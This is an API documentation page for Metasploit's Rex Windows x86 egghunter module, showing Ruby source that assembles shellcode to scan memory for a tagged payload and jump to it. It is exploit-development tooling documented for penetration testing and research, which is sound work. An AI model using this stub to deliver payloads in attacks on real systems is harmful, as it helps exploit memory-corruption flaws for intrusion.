Module: Rex::Exploitation::Egghunter::Windows::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary collapse
- Alias =
ARCH_X86
Instance Method Summary collapse
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for win/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for win/x86.
40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
# File 'lib/rex/exploitation/egghunter.rb', line 40 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'edx' startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = <<EOS #{startstub} check_readable: or dx,0xfff next_addr: inc edx push edx push 0x02 ; use NtAccessCheckAndAuditAlarm syscall pop eax int 0x2e cmp al,5 pop edx je check_readable check_for_tag: ; check that the tag matches once mov eax,#{marker} mov edi,edx scasd jne next_addr ; it must match a second time too scasd jne next_addr ; check the checksum if the feature is enabled #{checksum} ; jump to the payload jmp edi EOS assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end |